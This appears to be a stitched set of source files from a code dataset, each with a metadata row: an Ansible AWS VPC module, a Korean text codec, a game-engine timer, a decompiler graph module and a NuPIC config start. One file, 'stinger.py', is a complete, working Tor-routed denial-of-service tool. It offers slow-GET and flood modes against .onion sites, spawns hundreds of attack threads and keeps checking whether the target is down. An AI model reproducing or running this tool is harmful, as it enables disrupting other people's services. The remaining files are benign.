new_rt = vpc_conn.create_route_table(vpc.id)
new_rt_tags = rt.get('resource_tags', None)
if new_rt_tags:
vpc_conn.create_tags(new_rt.id, new_rt_tags)
for route in rt['routes']:
route_kwargs = {}
if route['gw'] == 'igw':
if not internet_gateway:
module.fail_json(
msg='You asked for an Internet Gateway ' \
'(igw) route, but you have no Internet Gateway'
)
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
vpc_conn.create_route(new_rt.id, route['dest'], **route_kwargs)
# Associate with subnets
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
rsn = rsn[0]
# Disassociate then associate since we don't have replace
old_rt = vpc_conn.get_all_route_tables(
filters={'association.subnet_id': rsn.id, 'vpc_id': vpc.id}
)
old_rt = [ x for x in old_rt if x.id != None ]
if len(old_rt) == 1:
old_rt = old_rt[0]
association_id = None
for a in old_rt.associations:
if a.subnet_id == rsn.id:
association_id = a.id
vpc_conn.disassociate_route_table(association_id)
vpc_conn.associate_route_table(new_rt.id, rsn.id)
all_route_tables.append(new_rt)
changed = True
except EC2ResponseError, e:
module.fail_json(
msg='Unable to create and associate route table {0}, error: ' \
'{1}'.format(rt, e)
)
# Now that we are good to go on our new route tables, delete the
# old ones except the 'main' route table as boto can't set the main
# table yet.
all_rts = vpc_conn.get_all_route_tables(filters={'vpc-id': vpc.id})
for rt in all_rts:
if rt.id is None:
continue
delete_rt = True
for newrt in all_route_tables:
if newrt.id == rt.id:
delete_rt = False
break
if delete_rt:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
break
try:
if not is_main:
vpc_conn.delete_route_table(rt.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete old route table {0}, error: {1}'.format(rt.id, e))
vpc_dict = get_vpc_info(vpc)
created_vpc_id = vpc.id
returned_subnets = []
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
for sn in current_subnets:
returned_subnets.append({
'resource_tags': dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': sn.id})),
'cidr': sn.cidr_block,
'az': sn.availability_zone,
'id': sn.id,
})
if subnets is not None:
# Sort subnets by the order they were listed in the play
order = {}
for idx, val in enumerate(subnets):
order[val['cidr']] = idx
# Number of subnets in the play
subnets_in_play = len(subnets)
returned_subnets.sort(key=lambda x: order.get(x['cidr'], subnets_in_play))
return (vpc_dict, created_vpc_id, returned_subnets, igw_id, changed)
def terminate_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Terminates a VPC
module: Ansible module object
vpc_conn: authenticated VPCConnection connection object
vpc_id: a vpc id to terminate
cidr: The cidr block of the VPC - can be used in lieu of an ID
Returns a dictionary of VPC information
about the VPC terminated.
If the VPC to be terminated is available
"changed" will be set to True.
"""
vpc_dict = {}
terminated_vpc_id = ''
changed = False
vpc = find_vpc(module, vpc_conn, vpc_id, cidr)
if vpc is not None:
if vpc.state == 'available':
terminated_vpc_id=vpc.id
vpc_dict=get_vpc_info(vpc)
try:
subnets = vpc_conn.get_all_subnets(filters={'vpc_id': vpc.id})
for sn in subnets:
vpc_conn.delete_subnet(sn.id)
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc.id}
)
for igw in igws:
vpc_conn.detach_internet_gateway(igw.id, vpc.id)
vpc_conn.delete_internet_gateway(igw.id)
rts = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id})
for rt in rts:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
if not is_main:
vpc_conn.delete_route_table(rt.id)
vpc_conn.delete_vpc(vpc.id)
except EC2ResponseError, e:
module.fail_json(
msg='Unable to delete VPC {0}, error: {1}'.format(vpc.id, e)
)
changed = True
vpc_dict['state'] = "terminated"
return (changed, vpc_dict, terminated_vpc_id)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
cidr_block = dict(),
instance_tenancy = dict(choices=['default', 'dedicated'], default='default'),
wait = dict(type='bool', default=False),
wait_timeout = dict(default=300),
dns_support = dict(type='bool', default=True),
dns_hostnames = dict(type='bool', default=True),
subnets = dict(type='list'),
vpc_id = dict(),
internet_gateway = dict(type='bool', default=False),
resource_tags = dict(type='dict', required=True),
route_tables = dict(type='list'),
state = dict(choices=['present', 'absent'], default='present'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
# If we have a region specified, connect to its endpoint.
if region:
try:
vpc_conn = boto.vpc.connect_to_region(
region,
**aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg = str(e))
else:
module.fail_json(msg="region must be specified")
igw_id = None
if module.params.get('state') == 'absent':
vpc_id = module.params.get('vpc_id')
cidr = module.params.get('cidr_block')
(changed, vpc_dict, new_vpc_id) = terminate_vpc(module, vpc_conn, vpc_id, cidr)
subnets_changed = None
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning a new VPC
(vpc_dict, new_vpc_id, subnets_changed, igw_id, changed) = create_vpc(module, vpc_conn)
module.exit_json(changed=changed, vpc_id=new_vpc_id, vpc=vpc_dict, igw_id=igw_id, subnets=subnets_changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| gpl-3.0 | 5,779,987,011,829,108,000 | 38.716198 | 922 | 0.566334 | false |
vicky2135/lucious | lib/python2.7/encodings/euc_kr.py | 816 | 1027 | #
# euc_kr.py: Python Unicode Codec for EUC_KR
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('euc_kr')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_kr',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| bsd-3-clause | -839,817,443,611,323,800 | 25.333333 | 74 | 0.696203 | false |
whitepacket/Stinger-Tor | stinger.py | 1 | 6382 | #!/usr/bin/env python
#Stinger-Tor
#Function names are written in the order metasploit launches attacks: RECON - EXPLOIT - PAYLOAD - LOOT for entertainment purposes.
#Requires Socksipy (socks.py) in the current directory. Download it from here: https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py
#I'm not responsible for any damages or consequences resulting from the use of this script, you are.
#For legal, research purposes only!
import os, socks, argparse, time, random, re, thread
parser = argparse.ArgumentParser(description='Tor server (.onion) unblockable DoS tool') #Basic CLI arguments.
parser.add_argument('-s', help="Host (.onion) to attack")
parser.add_argument('-p', default=80, help="Host port to flood (default: 80)")
parser.add_argument('-t', default=256, help="Attack threads (default: 256, max: 376)")
parser.add_argument('-tp', default=9050, help="Tor port on (default: 9050). Use 9150 when using the Tor Browser Bundle.")
parser.add_argument('-m', default='slow', help="Method. 1: slowget, 2: flood")
args = parser.parse_args()
if not args.s.lower().endswith(".onion"): #Only onion addresses accepted.
print "Error: server specified is not hosted under Tor."
exit(1)
elif not len(list(args.s.lower())) == 22:
print "Error: server specified is not hosted under Tor."
exit(1)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", int(args.tp))
except e as Exception:
print "Error: Tor port is not an integer."
exit(1)
exploit = ("GET / HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Connection: keep-alive\r\n\r\n"
% (args.s)) #Exact replica of the HTTP request sent by the Tor Browser Bundle, filtering this request will be DoS in itself.
# update: you will want to change the user agent to the latest Tor Browser UA or just copy a full request using Live HTTP Headers or Wireshark so it stays identical.
def payload(s, exploit): #floods the open socket with GET requests till it closes (if ever), or opens as many sockets as possible and slowly sends the HTTP headers.
if args.m.lower().startswith("slow") or args.m.lower() == '1':
while 1:
for header in exploit:
s.send(header)
time.sleep(random.randrange(5,20))
else:
while 1:
s.send(exploit)
def recon(host, port, exploit):
while 1:
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((host, port))
payload(s,exploit)
except:
pass
if int(args.tp) < 1: #Make sure all options were typed correctly...
print "Error: invalid tor port."
exit(1)
elif int(args.tp) > 65535:
print "Error: tor port too large."
exit(1)
elif int(args.p) < 1:
print "Error: invalid server port."
exit(1)
elif int(args.t) < 1:
print "Error: too little threads."
exit(1)
elif int(args.t) > 376:
print "Error: too many threads. maximum is 376."
exit(1)
elif int(args.p) > 65535:
print "Error: server port too large."
exit(1)
method = "SlowGET" #Below is basically a summary of the user-specified settings and what's taking place.
if not args.m.lower().startswith('slow') and not args.m == "1":
method = "Flooder"
print '*********************************'
print '* [stinger] *'
print '* initiating stress test.. *'
print '* -stress test details- *'
print '* host: '+args.s+' *'
nex = '* server port: '+str(args.p)
for x in range(0,15 - len(list(str(args.p))) + 1):
nex += " "
nex += "*"
print nex
nex = '* tor port: '+str(args.tp)
for x in range(0,18 - len(list(str(args.tp))) + 1):
nex += " "
nex += "*"
print nex
print '* DoS ETA: 1 minute *'
print '* method: '+method+' *'
nex = '* threads: '+str(args.t)
if int(args.t) > 99:
for x in range(0,17):
nex += " "
elif int(args.t) < 100 and int(args.t) > 9:
for x in range(0,18):
nex += " "
else:
for x in range(0,19):
nex += " "
nex += "*"
print nex
print '*********************************'
time.sleep(3)
print 'starting threads...'
time.sleep(3)
for x in range(0,int(args.t)):
try:
thread.start_new_thread(recon, (args.s, int(args.p), exploit))
print 'Thread: '+str(x+1)+' started.'
except:
print "Error: maximum threads reached. attack will still continue."
break
print 'threads started.'
time.sleep(2)
print "initiating server status checker." #Here we repeatedly check the server status in order to know weather or not our DoS is succeeding.
while 1: #it might be a good idea to develop something to escape this loop, so we don't need to kill the Python process.
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((args.s, int(args.p)))
s.send(exploit)
r = s.recv(256)
s.close() #it might be a good idea to use more specified error messages to avoid false positives, however, this is sufficient most of the time.
if 'network read timeout' in r.lower() or 'network connect timeout' in r.lower() or 'origin connection time-out' in r.lower() or 'unknown error' in r.lower() or 'bandwidth limit exceeded' in r.lower() or 'gateway timeout' in r.lower() or 'service unavaliable' in r.lower() or 'bad gateway' in r.lower() or 'internal server error' in r.lower() or 'no response' in r.lower() or 'too many requests' in r.lower() or 'request timeout' in r.lower():
#detects when the server software is under denial of service, but the server is still responsive.
#598 Network read timeout - 599 Network connect timeout - 522 Origin Connection Time-out - 520 Unknown Error - 509 Bandwidth Limit - 504 Gateway Timeout - 503 Service Unavaliable - 502 Bad Gateway - 500 Internal Server Error - 444 No Response - 429 Too Many Requests - 408 Request Timeout
print 'Server offline: returning error responses.'
else:
print 'Server is online.'
except:
print 'Server offline: unable to connect to TCP port, or receive HTTP response.'
| mpl-2.0 | 8,237,489,491,691,621,000 | 43.943662 | 451 | 0.639611 | false |
DrDub/pilas | pilas/actores/temporizador.py | 5 | 2558 | # -*- encoding: utf-8 -*-
# For Pilas engine - A video game framework.
#
# Copyright 2010 - Pablo Garrido
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
#
import pilas
from pilas.actores import Texto
from pilas import colores
class Temporizador(Texto):
"""Representa un contador de tiempo con cuenta regresiva.
Por ejemplo:
>>> t = pilas.actores.Temporizador()
>>> def hola_mundo():
... pilas.avisar("Hola mundo, pasaron 10 segundos...")
...
>>> t.ajustar(10, hola_mundo)
>>> t.iniciar()
"""
def __init__(self, x=0, y=0, color=colores.negro, fuente=None,
autoeliminar=False):
"""Inicializa el temporizador.
:param x: Posiciรณn horizontal.
:param y: Posiciรณn vertical.
:param color: El color que tendrรก el texto.
:param autoeliminar: Indica si se desea eliminar el Temporizador
cuando acabe.
"""
Texto.__init__(self, '0', x=x, y=y, fuente=fuente)
self.ajustar(1, self.funcion_vacia)
self.color = color
self.autoeliminar = autoeliminar
# funcion cuando no se ajusta temporizador
def funcion_vacia(self):
pass
def definir_tiempo_texto(self, variable):
"""Define el texto a mostrar en el temporizador.
:param variable: La cadena de texto a mostrar.
"""
self.texto = str(variable)
# con la funcion ajustar manipulamos el tiempo y la
# funcion queremos ejecutar
def ajustar(self, tiempo=1, funcion=None):
"""Indica una funcion para ser invocada en el tiempo indicado.
La funciรณn no tiene que recibir parรกmetros, y luego de
ser indicada se tiene que iniciar el temporizador.
"""
self.tiempo = tiempo
self.definir_tiempo_texto(self.tiempo)
if funcion == None:
self.funcion = self.funcion_vacia()
else:
self.funcion = funcion
def _restar_a_contador(self):
if self.tiempo != 0:
self.tiempo -= 1
self.definir_tiempo_texto(self.tiempo)
return True
def autoeliminar_al_terminar(self):
self.funcion()
if self.autoeliminar:
self.eliminar()
def iniciar(self):
"""Inicia el contador de tiempo con la funciรณn indicada."""
pilas.mundo.agregar_tarea_una_vez(self.tiempo, self.autoeliminar_al_terminar)
pilas.mundo.agregar_tarea_siempre(1, self._restar_a_contador)
| lgpl-3.0 | -2,760,788,048,209,795,600 | 29.380952 | 85 | 0.613245 | false |
dandycheung/androguard | androguard/decompiler/dad/graph.py | 34 | 17082 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <[email protected]>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
from androguard.decompiler.dad.basic_blocks import (build_node_from_block,
StatementBlock, CondBlock)
from androguard.decompiler.dad.instruction import Variable
logger = logging.getLogger('dad.graph')
class Graph():
def __init__(self):
self.entry = None
self.exit = None
self.nodes = list()
self.rpo = []
self.edges = defaultdict(list)
self.catch_edges = defaultdict(list)
self.reverse_edges = defaultdict(list)
self.reverse_catch_edges = defaultdict(list)
self.loc_to_ins = None
self.loc_to_node = None
def sucs(self, node):
return self.edges.get(node, [])
def all_sucs(self, node):
return self.edges.get(node, []) + self.catch_edges.get(node, [])
def preds(self, node):
return [n for n in self.reverse_edges.get(node, [])
if not n.in_catch]
def all_preds(self, node):
return (self.reverse_edges.get(node, []) +
self.reverse_catch_edges.get(node, []))
def add_node(self, node):
self.nodes.append(node)
def add_edge(self, e1, e2):
lsucs = self.edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def add_catch_edge(self, e1, e2):
lsucs = self.catch_edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_catch_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def remove_node(self, node):
preds = self.reverse_edges.pop(node, [])
for pred in preds:
self.edges[pred].remove(node)
succs = self.edges.pop(node, [])
for suc in succs:
self.reverse_edges[suc].remove(node)
exc_preds = self.reverse_catch_edges.pop(node, [])
for pred in exc_preds:
self.catch_edges[pred].remove(node)
exc_succs = self.catch_edges.pop(node, [])
for suc in exc_succs:
self.reverse_catch_edges[suc].remove(node)
self.nodes.remove(node)
if node in self.rpo:
self.rpo.remove(node)
del node
def number_ins(self):
self.loc_to_ins = {}
self.loc_to_node = {}
num = 0
for node in self.rpo:
start_node = num
num = node.number_ins(num)
end_node = num - 1
self.loc_to_ins.update(node.get_loc_with_ins())
self.loc_to_node[(start_node, end_node)] = node
def get_ins_from_loc(self, loc):
return self.loc_to_ins.get(loc)
def get_node_from_loc(self, loc):
for (start, end), node in self.loc_to_node.iteritems():
if start <= loc <= end:
return node
def remove_ins(self, loc):
ins = self.get_ins_from_loc(loc)
self.get_node_from_loc(loc).remove_ins(loc, ins)
self.loc_to_ins.pop(loc)
def split_if_nodes(self):
'''
Split IfNodes in two nodes, the first node is the header node, the
second one is only composed of the jump condition.
'''
node_map = {n: n for n in self.nodes}
to_update = set()
for node in self.nodes[:]:
if node.type.is_cond:
if len(node.get_ins()) > 1:
pre_ins = node.get_ins()[:-1]
last_ins = node.get_ins()[-1]
pre_node = StatementBlock('%s-pre' % node.name, pre_ins)
cond_node = CondBlock('%s-cond' % node.name, [last_ins])
node_map[node] = pre_node
node_map[pre_node] = pre_node
node_map[cond_node] = cond_node
pre_node.copy_from(node)
cond_node.copy_from(node)
for var in node.var_to_declare:
pre_node.add_variable_declaration(var)
pre_node.type.is_stmt = True
cond_node.true = node.true
cond_node.false = node.false
for pred in self.all_preds(node):
pred_node = node_map[pred]
# Verify that the link is not an exception link
if node not in self.sucs(pred):
self.add_catch_edge(pred_node, pre_node)
continue
if pred is node:
pred_node = cond_node
if pred.type.is_cond: # and not (pred is node):
if pred.true is node:
pred_node.true = pre_node
if pred.false is node:
pred_node.false = pre_node
self.add_edge(pred_node, pre_node)
for suc in self.sucs(node):
self.add_edge(cond_node, node_map[suc])
# We link all the exceptions to the pre node instead of the
# condition node, which should not trigger any of them.
for suc in self.catch_edges.get(node, []):
self.add_catch_edge(pre_node, node_map[suc])
if node is self.entry:
self.entry = pre_node
self.add_node(pre_node)
self.add_node(cond_node)
self.add_edge(pre_node, cond_node)
pre_node.update_attribute_with(node_map)
cond_node.update_attribute_with(node_map)
self.remove_node(node)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def simplify(self):
'''
Simplify the CFG by merging/deleting statement nodes when possible:
If statement B follows statement A and if B has no other predecessor
besides A, then we can merge A and B into a new statement node.
We also remove nodes which do nothing except redirecting the control
flow (nodes which only contains a goto).
'''
redo = True
while redo:
redo = False
node_map = {}
to_update = set()
for node in self.nodes[:]:
if node.type.is_stmt and node in self.nodes:
sucs = self.all_sucs(node)
if len(sucs) != 1:
continue
suc = sucs[0]
if len(node.get_ins()) == 0:
if any(pred.type.is_switch
for pred in self.all_preds(node)):
continue
if node is suc:
continue
node_map[node] = suc
for pred in self.all_preds(node):
pred.update_attribute_with(node_map)
if node not in self.sucs(pred):
self.add_catch_edge(pred, suc)
continue
self.add_edge(pred, suc)
redo = True
if node is self.entry:
self.entry = suc
self.remove_node(node)
elif (suc.type.is_stmt and
len(self.all_preds(suc)) == 1 and
not (suc in self.catch_edges) and
not ((node is suc) or (suc is self.entry))):
ins_to_merge = suc.get_ins()
node.add_ins(ins_to_merge)
for var in suc.var_to_declare:
node.add_variable_declaration(var)
new_suc = self.sucs(suc)[0]
if new_suc:
self.add_edge(node, new_suc)
for exception_suc in self.catch_edges.get(suc, []):
self.add_catch_edge(node, exception_suc)
redo = True
self.remove_node(suc)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def compute_rpo(self):
'''
Number the nodes in reverse post order.
An RPO traversal visit as many predecessors of a node as possible
before visiting the node itself.
'''
nb = len(self.nodes) + 1
for node in self.post_order():
node.num = nb - node.po
self.rpo = sorted(self.nodes, key=lambda n: n.num)
def post_order(self):
'''
Return the nodes of the graph in post-order i.e we visit all the
children of a node before visiting the node itself.
'''
def _visit(n, cnt):
visited.add(n)
for suc in self.all_sucs(n):
if not suc in visited:
for cnt, s in _visit(suc, cnt):
yield cnt, s
n.po = cnt
yield cnt + 1, n
visited = set()
for _, node in _visit(self.entry, 1):
yield node
def draw(self, name, dname, draw_branches=True):
from pydot import Dot, Edge
g = Dot()
g.set_node_defaults(color='lightgray', style='filled', shape='box',
fontname='Courier', fontsize='10')
for node in sorted(self.nodes, key=lambda x: x.num):
if draw_branches and node.type.is_cond:
g.add_edge(Edge(str(node), str(node.true), color='green'))
g.add_edge(Edge(str(node), str(node.false), color='red'))
else:
for suc in self.sucs(node):
g.add_edge(Edge(str(node), str(suc), color='blue'))
for except_node in self.catch_edges.get(node, []):
g.add_edge(Edge(str(node), str(except_node),
color='black', style='dashed'))
g.write_png('%s/%s.png' % (dname, name))
def immediate_dominators(self):
return dom_lt(self)
def __len__(self):
return len(self.nodes)
def __repr__(self):
return str(self.nodes)
def __iter__(self):
for node in self.nodes:
yield node
def dom_lt(graph):
'''Dominator algorithm from Lengaeur-Tarjan'''
def _dfs(v, n):
semi[v] = n = n + 1
vertex[n] = label[v] = v
ancestor[v] = 0
for w in graph.all_sucs(v):
if not semi[w]:
parent[w] = v
n = _dfs(w, n)
pred[w].add(v)
return n
def _compress(v):
u = ancestor[v]
if ancestor[u]:
_compress(u)
if semi[label[u]] < semi[label[v]]:
label[v] = label[u]
ancestor[v] = ancestor[u]
def _eval(v):
if ancestor[v]:
_compress(v)
return label[v]
return v
def _link(v, w):
ancestor[w] = v
parent, ancestor, vertex = {}, {}, {}
label, dom = {}, {}
pred, bucket = defaultdict(set), defaultdict(set)
# Step 1:
semi = {v: 0 for v in graph.nodes}
n = _dfs(graph.entry, 0)
for i in xrange(n, 1, -1):
w = vertex[i]
# Step 2:
for v in pred[w]:
u = _eval(v)
y = semi[w] = min(semi[w], semi[u])
bucket[vertex[y]].add(w)
pw = parent[w]
_link(pw, w)
# Step 3:
bpw = bucket[pw]
while bpw:
v = bpw.pop()
u = _eval(v)
dom[v] = u if semi[u] < semi[v] else pw
# Step 4:
for i in range(2, n + 1):
w = vertex[i]
dw = dom[w]
if dw != vertex[semi[w]]:
dom[w] = dom[dw]
dom[graph.entry] = None
return dom
def bfs(start):
to_visit = [start]
visited = set([start])
while to_visit:
node = to_visit.pop(0)
yield node
if node.exception_analysis:
for _, _, exception in node.exception_analysis.exceptions:
if exception not in visited:
to_visit.append(exception)
visited.add(exception)
for _, _, child in node.childs:
if child not in visited:
to_visit.append(child)
visited.add(child)
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def make_node(graph, block, block_to_node, vmap, gen_ret):
node = block_to_node.get(block)
if node is None:
node = build_node_from_block(block, vmap, gen_ret)
block_to_node[block] = node
if block.exception_analysis:
for _type, _, exception_target in block.exception_analysis.exceptions:
exception_node = block_to_node.get(exception_target)
if exception_node is None:
exception_node = build_node_from_block(exception_target,
vmap, gen_ret, _type)
exception_node.in_catch = True
block_to_node[exception_target] = exception_node
graph.add_catch_edge(node, exception_node)
for _, _, child_block in block.childs:
child_node = block_to_node.get(child_block)
if child_node is None:
child_node = build_node_from_block(child_block, vmap, gen_ret)
block_to_node[child_block] = child_node
graph.add_edge(node, child_node)
if node.type.is_switch:
node.add_case(child_node)
if node.type.is_cond:
if_target = ((block.end / 2) - (block.last_length / 2) +
node.off_last_ins)
child_addr = child_block.start / 2
if if_target == child_addr:
node.true = child_node
else:
node.false = child_node
# Check that both branch of the if point to something
# It may happen that both branch point to the same node, in this case
# the false branch will be None. So we set it to the right node.
# TODO: In this situation, we should transform the condition node into
# a statement node
if node.type.is_cond and node.false is None:
node.false = node.true
return node
def construct(start_block, vmap, exceptions):
bfs_blocks = bfs(start_block)
graph = Graph()
gen_ret = GenInvokeRetName()
# Construction of a mapping of basic blocks into Nodes
block_to_node = {}
exceptions_start_block = []
for exception in exceptions:
for _, _, block in exception.exceptions:
exceptions_start_block.append(block)
for block in bfs_blocks:
node = make_node(graph, block, block_to_node, vmap, gen_ret)
graph.add_node(node)
graph.entry = block_to_node[start_block]
del block_to_node, bfs_blocks
graph.compute_rpo()
graph.number_ins()
for node in graph.rpo:
preds = [pred for pred in graph.all_preds(node)
if pred.num < node.num]
if preds and all(pred.in_catch for pred in preds):
node.in_catch = True
# Create a list of Node which are 'return' node
# There should be one and only one node of this type
# If this is not the case, try to continue anyway by setting the exit node
# to the one which has the greatest RPO number (not necessarily the case)
lexit_nodes = [node for node in graph if node.type.is_return]
if len(lexit_nodes) > 1:
# Not sure that this case is possible...
logger.error('Multiple exit nodes found !')
graph.exit = graph.rpo[-1]
elif len(lexit_nodes) < 1:
# A method can have no return if it has throw statement(s) or if its
# body is a while(1) whitout break/return.
logger.debug('No exit node found !')
else:
graph.exit = lexit_nodes[0]
return graph
| apache-2.0 | -671,589,271,791,483,100 | 34.220619 | 79 | 0.517562 | false |
sambitgaan/nupic | tests/swarming/nupic/swarming/experiments/oneField/description.py | 32 | 14387 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer,
DeferredDictLookup)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
# NOTE: Use of DEFERRED VALUE-GETTERs: dictionary fields and list elements
# within the config dictionary may be assigned futures derived from the
# ValueGetterBase class, such as DeferredDictLookup.
# This facility is particularly handy for enabling substitution of values in
# the config dictionary from other values in the config dictionary, which is
# needed by permutation.py-based experiments. These values will be resolved
# during the call to applyValueGettersToContainer(),
# which we call after the base experiment's config dictionary is updated from
# the sub-experiment. See ValueGetterBase and
# DeferredDictLookup for more details about value-getters.
#
# For each custom encoder parameter to be exposed to the sub-experiment/
# permutation overrides, define a variable in this section, using key names
# beginning with a single underscore character to avoid collisions with
# pre-defined keys (e.g., _dsEncoderFieldName2_N).
#
# Example:
# config = dict(
# _dsEncoderFieldName2_N = 70,
# _dsEncoderFieldName2_W = 5,
# dsEncoderSchema = [
# base=dict(
# fieldname='Name2', type='ScalarEncoder',
# name='Name2', minval=0, maxval=270, clipInput=True,
# n=DeferredDictLookup('_dsEncoderFieldName2_N'),
# w=DeferredDictLookup('_dsEncoderFieldName2_W')),
# ],
# )
# updateConfigFromSubConfig(config)
# applyValueGettersToContainer(config)
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'gym', 'first'),
(u'consumption', 'mean'),
(u'address', 'first')],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalNextStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# dsEncoderSchema = [
# DeferredDictLookup('__field_name_encoder'),
# ],
#
# (value generated from DS_ENCODER_SCHEMA)
'encoders': {
'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'maxval': 200,
'minval': 0,
'n': 1500,
'name': u'consumption',
'type': 'ScalarEncoder',
'w': 21
},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
